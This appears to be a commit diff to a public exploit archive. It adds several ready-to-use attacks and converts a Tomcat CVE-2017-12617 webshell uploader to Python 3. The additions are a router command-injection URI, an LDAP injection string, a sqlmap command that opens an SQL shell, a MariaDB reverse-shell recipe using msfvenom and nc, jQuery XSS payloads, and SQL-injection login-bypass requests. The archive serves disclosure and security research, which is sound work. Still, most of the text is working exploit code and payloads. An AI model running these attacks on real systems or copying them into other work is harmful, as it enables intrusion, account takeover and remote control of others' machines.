DB: 2021-04-15

8 changes to exploits/shellcodes MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass) CITSmart ITSM 9.1.2.22 - LDAP Injection CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated) Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE jQuery 1.2 - Cross-Site Scripting (XSS) jQuery 1.0.3 - Cross-Site Scripting (XSS)
2021-04-15 05:01:57 +00:00 · 2021-04-15 05:01:57 +00:00 · bccca11e26
commit bccca11e26
parent 884f246971
9 changed files with 220 additions and 54 deletions
--- a/exploits/hardware/webapps/49764.txt
+++ b/exploits/hardware/webapps/49764.txt
@ -0,0 +1,10 @@
 # Exploit Title: Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE
 # Date: 12-4-2021
 # Exploit Author: Jay Sharma 
 # Version: Genexis PLATINUM 4410 2.1 P4410-V2-1.28
 # Tested on: V2.1
 # CVE : CVE-2021-29003
 #steps to reproduce#
 Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the http://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI
--- a/exploits/java/webapps/49762.txt
+++ b/exploits/java/webapps/49762.txt
@ -0,0 +1,22 @@
 # Exploit Title: CITSmart ITSM 9.1.2.22 - LDAP Injection
 # Google Dork: "citsmart.local"
 # Date: 29/12/2020
 # Exploit Author: skysbsb
 # Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
 # Version: < 9.1.2.23
 # CVE : CVE-2020-35775
 To exploit this flaw it is necessary to have at least one user/password previously registered, because the system checks (ldap bind) the first user returned in the ldap search. However, it returns the last user found in the search to the function that called it (logic error).
 So, I call this problem an LDAP injection in conjunction with a programming logic error that allows you to authenticate to CITSmart ITSM with another valid user without needing to know the target user's password.
 Affected versions: < 9.1.2.23
 Fixed versions: >= 9.1.2.23
 Using this LDAP query in the username field of login page you could login with the target_username account without knowing the target account password.
 *)(|(sAMAccountName=valid_username)(sAMAccountName=target_username)
 You must know at least one username/password because the autenticacaoAD() function at LDAPUtils.java class (package br.com.centralit.citcorpore.integracao.ad) will try to bind with the first user (valid_username) of the query result.
 Vendor has acknowledge this vulnerability at ticket 5929 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)
--- a/exploits/java/webapps/49763.txt
+++ b/exploits/java/webapps/49763.txt
@ -0,0 +1,21 @@
 # Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
 # Google Dork: "citsmart.local"
 # Date: 11/03/2021
 # Exploit Author: skysbsb
 # Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
 # Version: < 9.1.2.28
 # CVE : CVE-2021-28142
 To exploit this flaw it is necessary to be authenticated.
 URL vulnerable:
 https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
 Param vulnerable: query
 Sqlmap usage:  sqlmap -u "
 https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell
 Affected versions: < 9.1.2.28
 Fixed versions: >= 9.1.2.28
 Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)
--- a/exploits/jsp/webapps/42966.py
+++ b/exploits/jsp/webapps/42966.py
@ -4,13 +4,6 @@ import re
 import signal
 from optparse import OptionParser
 class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
@ -22,8 +15,6 @@ class bcolors:
    UNDERLINE = '\033[4m'
 banner="""
@ -41,9 +32,6 @@ banner="""
 """
 def signal_handler(signal, frame):
    print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
@ -71,7 +59,7 @@ def createPayload(url,f):
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
    if req.status_code==201:
-        print "File Created .."
+        print ("File Created ..")
 def RCE(url,f):
@ -81,15 +69,15 @@ def RCE(url,f):
    </FORM>
    <%@ page import="java.io.*" %>
    <%
-   String cmd = request.getParameter("cmd");
+    String cmd = request.getParameter("cmd");
-   String output = "";
+    String output = "";
-   if(cmd != null) {
+    if(cmd != null) {
-      String s = null;
+        String s = null;
-      try {
+        try {
-         Process p = Runtime.getRuntime().exec(cmd,null,null);
+            Process p = Runtime.getRuntime().exec(cmd,null,null);
-         BufferedReader sI = new BufferedReader(new
+            BufferedReader sI = new BufferedReader(new
-InputStreamReader(p.getInputStream()));
+    InputStreamReader(p.getInputStream()));
-         while((s = sI.readLine()) != null) { output += s+"</br>"; }
+    while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
 %>
@ -107,7 +95,7 @@ def shell(url,f):
    while True:
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-        cmd=raw_input("$ ")
+        cmd=input("$ ")
        payload={'cmd':cmd}
        if cmd=="q" or cmd=="Q":
                break
@ -115,7 +103,7 @@ def shell(url,f):
        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
        re=str(re.content)
        t=removetags(re)
-        print t
+        print (t)
@ -178,35 +166,35 @@ if opt.U==None and opt.P==None and opt.L==None:
 else:
    if opt.U!=None and opt.P==None and opt.L==None:
-        print bcolors.OKGREEN+banner+bcolors.ENDC 
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
-    	url=str(opt.U)
+        url=str(opt.U)
-    	checker="Poc.jsp"
+        checker="Poc.jsp"
-    	print bcolors.BOLD +"Poc Filename  {}".format(checker)
+        print (bcolors.BOLD +"Poc Filename  {}".format(checker))
-    	createPayload(str(url)+"/",checker)
+        createPayload(str(url)+"/",checker)
-    	con=getContent(str(url)+"/",checker)
+        con=getContent(str(url)+"/",checker)
-    	if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+        if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-    		print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
+            print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
-		print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
+            print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
-		
+    
-	else:
+        else:
-            print 'Not Vulnerable to CVE-2017-12617 '
+            print ('Not Vulnerable to CVE-2017-12617 ')
    elif opt.P!=None and opt.U!=None and  opt.L==None:
-                print bcolors.OKGREEN+banner+bcolors.ENDC 
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
-		pwn=str(opt.P)
+        pwn=str(opt.P)
-		url=str(opt.U)
+        url=str(opt.U)
-		print "Uploading Webshell ....."
+        print ("Uploading Webshell .....")
-		pwn=pwn+".jsp"
+        pwn=pwn+".jsp"
-		RCE(str(url)+"/",pwn)
+        RCE(str(url)+"/",pwn)
-		shell(str(url),pwn)
+        shell(str(url),pwn)
    elif opt.L!=None and opt.P==None and opt.U==None:
-                print bcolors.OKGREEN+banner+bcolors.ENDC 
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
-		w=str(opt.L)
+        w=str(opt.L)
-		f=open(w,"r")
+        f=open(w,"r")
-		print "Scaning hosts in {}".format(w)
+        print ("Scaning hosts in {}".format(w))
-		checker="Poc.jsp"
+        checker="Poc.jsp"
-		for i in f.readlines():
+        for i in f.readlines():
-			i=i.strip("\n")
+            i=i.strip("\n")
-			createPayload(str(i)+"/",checker)
+            createPayload(str(i)+"/",checker)
-			con=getContent(str(i)+"/",checker)
+            con=getContent(str(i)+"/",checker)
-			if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-				print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"
+                print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
--- a/exploits/linux/local/49765.txt
+++ b/exploits/linux/local/49765.txt
@ -0,0 +1,20 @@
 # Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
 # Date: 03/18/2021
 # Exploit Author: Central InfoSec
 # Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
 # Tested on: Linux
 # CVE : CVE-2021-27928
 # Proof of Concept:
 # Create the reverse shell payload
 msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
 # Start a listener
 nc -lvp <port>
 # Copy the payload to the target machine (In this example, SCP/SSH is used)
 scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
 # Execute the payload
 mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
--- a/exploits/multiple/webapps/49766.txt
+++ b/exploits/multiple/webapps/49766.txt
@ -0,0 +1,8 @@
 # Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS)
 # Date: 04/29/2020
 # Exploit Author: Central InfoSec
 # Version: jQuery versions greater than or equal to 1.2 and before 3.5.0
 # CVE : CVE-2020-11022
 # Proof of Concept 1:
 <option><style></option></select><img src=x onerror=alert(1)></style>
--- a/exploits/multiple/webapps/49767.txt
+++ b/exploits/multiple/webapps/49767.txt
@ -0,0 +1,11 @@
 # Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS)
 # Date: 04/29/2020
 # Exploit Author: Central InfoSec
 # Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
 # CVE : CVE-2020-11023
 # Proof of Concept 1:
 <style><style /><img src=x onerror=alert(1)>
 # Proof of Concept 2 (Only jQuery 3.x affected):
 <img alt="<x" title="/><img src=x onerror=alert(1)>">
--- a/exploits/php/webapps/49761.txt
+++ b/exploits/php/webapps/49761.txt
@ -0,0 +1,79 @@
 # Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)
 # Date: 13 April 2021
 # Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)
 # Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/
 # Software Link: https://iwantfilemanager.com/?dl=b48d951cbdd50568b031aab3b619fed2
 I Found SQL Injection in 4 Page Login (Police Login page, Incharge Login page, User Login & HQ Login)
 *Police Login page*
 POST /digital-cyber-crime-report/policelogin.php HTTP/1.1
 Host: 192.168.1.14
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
 Gecko/20100101 Firefox/87.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 53
 Origin: http://192.168.1.14
 Connection: close
 Referer: http://192.168.1.14/digital-cyber-crime-report/policelogin.php
 Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
 Upgrade-Insecure-Requests: 1
 email='or''='&password='or''='&s=
 *Incharge Login*
 POST /digital-cyber-crime-report/inchargelogin.php HTTP/1.1
 Host: 192.168.1.14
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
 Gecko/20100101 Firefox/87.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 53
 Origin: http://192.168.1.14
 Connection: close
 Referer: http://192.168.1.14/digital-cyber-crime-report/inchargelogin.php
 Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
 Upgrade-Insecure-Requests: 1
 email='or''='&password='or''='&s=
 *User Login*
 POST /digital-cyber-crime-report/userlogin.php HTTP/1.1
 Host: 192.168.1.14
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
 Gecko/20100101 Firefox/87.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 61
 Origin: http://192.168.1.14
 Connection: close
 Referer: http://192.168.1.14/digital-cyber-crime-report/userlogin.php
 Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
 Upgrade-Insecure-Requests: 1
 email=imanakbar1000%40gmail.com&password='or''='&s=
 *HQ Login*
 POST /digital-cyber-crime-report/headlogin.php HTTP/1.1
 Host: 192.168.1.14
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
 Gecko/20100101 Firefox/87.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 61
 Origin: http://192.168.1.14
 Connection: close
 Referer: http://192.168.1.14/digital-cyber-crime-report/headlogin.php
 Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
 Upgrade-Insecure-Requests: 1
 email=imanakbar1000%40gmail.com&password='or''='&s=
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11311,6 +11311,7 @@ id,file,description,date,author,type,platform,port
 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
 49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows,
 49765,exploits/linux/local/49765.txt,"MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution",2021-04-14,"Central InfoSec",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43937,3 +43938,9 @@ id,file,description,date,author,type,platform,port
 49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,
 49759,exploits/multiple/webapps/49759.txt,"Blitar Tourism 1.0 - Authentication Bypass SQLi",2021-04-13,sigeri94,webapps,multiple,
 49760,exploits/multiple/webapps/49760.txt,"ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow",2021-04-13,"Jai Kumar Sharma",webapps,multiple,
 49761,exploits/php/webapps/49761.txt,"Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)",2021-04-14,GaluhID,webapps,php,
 49762,exploits/java/webapps/49762.txt,"CITSmart ITSM 9.1.2.22 - LDAP Injection",2021-04-14,skysbsb,webapps,java,
 49763,exploits/java/webapps/49763.txt,"CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)",2021-04-14,skysbsb,webapps,java,
 49764,exploits/hardware/webapps/49764.txt,"Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE",2021-04-14,"Jay Sharma",webapps,hardware,
 49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
 49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,